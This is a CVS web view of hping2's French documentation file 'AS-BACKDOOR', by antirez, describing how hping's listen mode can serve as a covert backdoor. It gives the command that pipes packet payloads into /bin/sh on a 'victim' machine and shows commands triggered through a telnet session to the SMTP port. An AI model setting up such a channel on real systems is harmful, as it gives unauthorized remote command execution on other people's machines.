Return to AS-BACKDOOR CVS log | Up to [ELWIX - Embedded LightWeight unIX -] / embedaddon / hping2 / docs / french |
1.1 ! misho 1: hping peut être utilisé comme une backdoor (ndt : porte dérobée). Essayez ! 2: juste l'option -9 (--listen) et redirigez via un tube dans /bin/sh : ! 3: ! 4: Mettez hping en mode listen (ndt : d'écoute) sur le système victime. ! 5: ! 6: victim# hping -I eth0 -9 mysign | /bin/sh ! 7: ! 8: Chaque paquet qui contient "mysign" sera traité par hping, tous les octets ! 9: qui suivent "mysign" dans les paquets seront envoyés dans la sortie ! 10: standard, ainsi par exemple je serai capable d'exécuter des commandes en ! 11: utilisant tous types de protocoles. Juste pour exemple je peux utiliser le ! 12: démon smtpd pour exécuter 'ls' sur la victime. ! 13: ! 14: evil$ telnet victim 25 ! 15: ! 16: Trying 192.168.1.1... ! 17: Connected to nano (192.168.1.1). ! 18: Escape character is '^]'. ! 19: 220 nano.marmoc.net ESMTP Sendmail ! 20: mysignls; ! 21: ! 22: sur la victime vous verrez : ! 23: ! 24: victim# hping -I eth0 -9 mysign | /bin/sh ! 25: hping2 listen mode ! 26: bin cdrom etc home local-home mnt root tmp var ! 27: boot dev export lib lost+found proc sbin usr ! 28: : command not found ! 29: ! 30: Comme vous pouvez le voir j'utilise 'ls;' puisque sinon le shell recevra ! 31: juste ls^M. Le ";" force l'exécution de la commande (du moins avec bash et ! 32: zsh, vérifiez votre shell pour plus d'informations). ! 33: ! 34: Ceci fonctionne avec tous les types de paquets IP valides non filtrés, le ! 35: niveau supérieur de protocole importe peu. ! 36: ! 37: antirez <antirez@invece.org>